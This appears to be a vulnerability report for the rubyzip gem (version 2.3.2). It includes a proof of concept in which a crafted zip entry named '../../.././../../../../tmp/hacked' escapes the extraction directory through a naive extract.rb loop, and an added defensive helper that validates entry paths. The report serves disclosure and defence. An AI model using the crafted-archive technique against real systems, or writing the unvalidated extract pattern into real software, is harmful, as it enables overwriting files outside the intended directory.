Directory traversal vulnerability #540

@wonda-tea-coffee

Summary

In version 2.3.2, we are again experiencing the exact same problem as below.
#315

PoC

```
root@ea8d5cb86e9f:/work# ruby -v
ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [aarch64-linux]
root@ea8d5cb86e9f:/work# uname -a
Linux ea8d5cb86e9f 5.15.64-0-virt #1-Alpine SMP Mon, 05 Sep 2022 08:02:49 +0000 aarch64 GNU/Linux
root@ea8d5cb86e9f:/work# gem list | grep rubyzip
rubyzip (2.3.2)
root@ea8d5cb86e9f:/work# zipinfo traversal.zip
Archive: traversal.zip
Zip file size: 166 bytes, number of entries: 1
-rw-r--r-- 5.2 unx 0 t- defN 22-Nov-15 07:57 ../../.././../../../../tmp/hacked
1 file, 0 bytes uncompressed, 2 bytes compressed: 0.0%
root@ea8d5cb86e9f:/work# ls -l /tmp
total 0
root@ea8d5cb86e9f:/work# ruby extract.rb
Extracting ../../.././../../../../tmp/hacked
root@ea8d5cb86e9f:/work# ls -l /tmp
total 0
-rw-r--r-- 1 root root 0 Nov 16 00:55 hacked
```

extract.rb

```ruby
require 'zip'

Zip::File.open('traversal.zip') do |zip_file|
  # Handle entries one by one
  zip_file.each do |entry|
    # Extract to file/directory/symlink
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
```
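A caller-side check that refuses the entry name shown in the PoC before anything is written, as an added example that is not part of the original issue or of rubyzip's code. `safe_destination`, `extract_all` and `UnsafeEntryError` are hypothetical names, and the extraction directory is assumed to exist already.

```ruby
require 'pathname'
require 'fileutils'

class UnsafeEntryError < StandardError; end

# Map an archive entry name to an absolute path under base_dir.
# Raises UnsafeEntryError if the name would resolve outside base_dir.
# (Hypothetical helper for this example; not part of rubyzip.)
def safe_destination(base_dir, entry_name)
  base = Pathname.new(base_dir).realpath # base_dir must already exist
  name = entry_name.to_s
  raise UnsafeEntryError, 'empty name or NUL byte' if name.empty? || name.include?("\0")
  raise UnsafeEntryError, "absolute path: #{name}" if name.start_with?('/')

  # Lexically collapse "." and ".." before comparing against the base.
  dest = base.join(name).cleanpath
  unless dest.to_s.start_with?(base.to_s + File::SEPARATOR)
    raise UnsafeEntryError, "escapes #{base}: #{name}"
  end

  # A symlink already on disk below base could still redirect the write,
  # so refuse any symlinked component between dest and base.
  dest.ascend do |part|
    break if part == base
    raise UnsafeEntryError, "symlink in path: #{part}" if part.symlink?
  end
  dest.to_s
end

# Caller-side use with the rubyzip 2.x call shape from extract.rb.
# Needs the rubyzip gem; an unsafe entry aborts the extraction.
def extract_all(zip_path, base_dir)
  require 'zip'
  Zip::File.open(zip_path) do |zip_file|
    zip_file.each do |entry|
      dest = safe_destination(base_dir, entry.name)
      FileUtils.mkdir_p(File.dirname(dest))
      puts "Extracting #{entry.name} -> #{dest}"
      entry.extract(dest)
    end
  end
end
```

Raising on the first unsafe entry makes a hostile archive fail loudly; a caller that prefers to skip such entries can rescue `UnsafeEntryError` inside the loop and log the name instead.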
